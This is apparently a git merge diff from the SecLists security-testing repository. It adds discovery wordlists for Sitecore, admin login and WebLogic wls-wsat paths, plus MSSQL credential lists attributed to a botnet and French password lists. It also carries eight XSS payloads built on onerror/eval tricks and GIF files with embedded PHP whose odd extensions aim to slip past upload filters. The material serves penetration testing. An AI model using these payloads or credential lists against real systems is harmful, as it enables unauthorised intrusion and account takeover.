Merge branch 'master' of https://github.com/danielmiessler/SecLists into misc
# Conflicts: # Discovery/Infrastructure/common-router-ips.txt
16
Discovery/Web-Content/CMS/sitecore
Normal file
@ -0,0 +1,16 @@
|
||||
/App_Config
|
||||
/App_Config/ConnectionStrings.config
|
||||
/sitecore/
|
||||
/sitecore/admin
|
||||
/sitecore/admin/login.aspx
|
||||
/sitecore/debug
|
||||
/sitecore/default.aspx
|
||||
/sitecore/login
|
||||
/sitecore/login.aspx
|
||||
/sitecore/login/default.aspx
|
||||
/sitecore/shell/WebService
|
||||
/sitecore/shell/webservice/service.asmx
|
||||
/sitecore/shell/webservice/service2.asmx
|
||||
/sitecore/shell/sitecore.version.xml
|
||||
/sitecore/service
|
||||
/sitecore/service/nolayout.aspx
|
@ -11,6 +11,8 @@
|
||||
/admin-login
|
||||
/admin-login/
|
||||
/admin/
|
||||
/admin/auth.inc
|
||||
/admin/auth.inc.php
|
||||
/administrator
|
||||
/administrator/
|
||||
/administrator.asp
|
||||
@ -23,6 +25,12 @@
|
||||
/administrator.py
|
||||
/administrator.rb
|
||||
/admnistrator.php3
|
||||
/auth
|
||||
/auth/
|
||||
/auth.inc
|
||||
/auth.inc.php
|
||||
/authentication
|
||||
/authentication/
|
||||
/backend
|
||||
/backend/
|
||||
/cgi-bin/sqwebmail?noframes=1
|
||||
@ -57,6 +65,9 @@
|
||||
/logon.pl
|
||||
/logon.py
|
||||
/logon.rb
|
||||
/?page=admin.auth.inc
|
||||
/?page=auth.inc
|
||||
/?page=auth.inc.php
|
||||
/signin
|
||||
/signin/
|
||||
/signin.php?ret=
|
||||
|
@ -810,6 +810,7 @@
|
||||
/blog/wp-content/backup-db/
|
||||
/blog/wp-content/backups/
|
||||
/bot.txt
|
||||
/bower.json
|
||||
/buck.sql
|
||||
/build.gradle
|
||||
/build.local.xml
|
||||
|
@ -38,6 +38,15 @@
|
||||
/HTTPClntRecv/*
|
||||
/HTTPClntSend
|
||||
/HTTPClntSend/*
|
||||
/wls-wsat/CoordinatorPortType
|
||||
/wls-wsat/CoordinatorPortType11
|
||||
/wls-wsat/ParticipantPortType
|
||||
/wls-wsat/ParticipantPortType11
|
||||
/wls-wsat/RegistrationPortTypeRPC
|
||||
/wls-wsat/RegistrationPortTypeRPC11
|
||||
/wls-wsat/RegistrationRequesterPortType
|
||||
/wls-wsat/RegistrationRequesterPortType11
|
||||
/_async/AsyncResponseService
|
||||
/JspServlet
|
||||
/LogfileSearch
|
||||
/LogfileTail
|
||||
|
@ -0,0 +1,8 @@
|
||||
<script>onerror=alert;throw 1337</script>
|
||||
<script>{onerror=alert}throw 1337</script>
|
||||
<script>throw onerror=alert,'some string',123,'haha'</script>
|
||||
<script>{onerror=eval}throw'=alert\x281337\x29'</script>
|
||||
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
|
||||
<script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script>
|
||||
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
|
||||
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
|
172696
Passwords/mssql-passwords-nansh0u-guardicore.txt
Normal file
20000
Passwords/richelieu-french-top20000.txt
Normal file
5000
Passwords/richelieu-french-top5000.txt
Normal file
@ -1,4 +1,4 @@
|
||||
#/bin/sh
|
||||
#!/bin/sh
|
||||
#$ msf-pattern_create -l 255
|
||||
touch Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
|
||||
|
||||
|
5
Payloads/PHPInfo/make-aio.sh
Executable file
@ -0,0 +1,5 @@
|
||||
#!/bin/sh
|
||||
zip phpinfo-aio.zip phpinfo*.{p*,txt,jp*g,gif}
|
||||
|
||||
tar -cvf phpinfo-aio.tar phpinfo*.{p*,txt,jp*g,gif}
|
||||
|
2
Payloads/PHPInfo/phpinfo.""gif
Normal file
@ -0,0 +1,2 @@
|
||||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
After Width: | Height: | Size: 29 B |
2
Payloads/PHPInfo/phpinfo."gif
Normal file
@ -0,0 +1,2 @@
|
||||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
After Width: | Height: | Size: 29 B |
2
Payloads/PHPInfo/phpinfo.''gif
Normal file
@ -0,0 +1,2 @@
|
||||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
After Width: | Height: | Size: 29 B |
2
Payloads/PHPInfo/phpinfo.'gif
Normal file
@ -0,0 +1,2 @@
|
||||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
After Width: | Height: | Size: 29 B |
2
Payloads/PHPInfo/phpinfo.php.""gif
Normal file
@ -0,0 +1,2 @@
|
||||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
After Width: | Height: | Size: 29 B |
2
Payloads/PHPInfo/phpinfo.php."gif
Normal file
@ -0,0 +1,2 @@
|
||||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
After Width: | Height: | Size: 29 B |
2
Payloads/PHPInfo/phpinfo.php.''gif
Normal file
@ -0,0 +1,2 @@
|
||||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
After Width: | Height: | Size: 29 B |
2
Payloads/PHPInfo/phpinfo.php.'gif
Normal file
@ -0,0 +1,2 @@
|
||||
GIF89a1
|
||||
<?php phpinfo(); ?>
|
After Width: | Height: | Size: 29 B |
10
Usernames/mssql-usernames-nansh0u-guardicore.txt
Normal file
@ -0,0 +1,10 @@
|
||||
admin
|
||||
bwsa
|
||||
hbv7
|
||||
kisadmin
|
||||
su
|
||||
sa
|
||||
test
|
||||
users
|
||||
vice
|
||||
wwo
|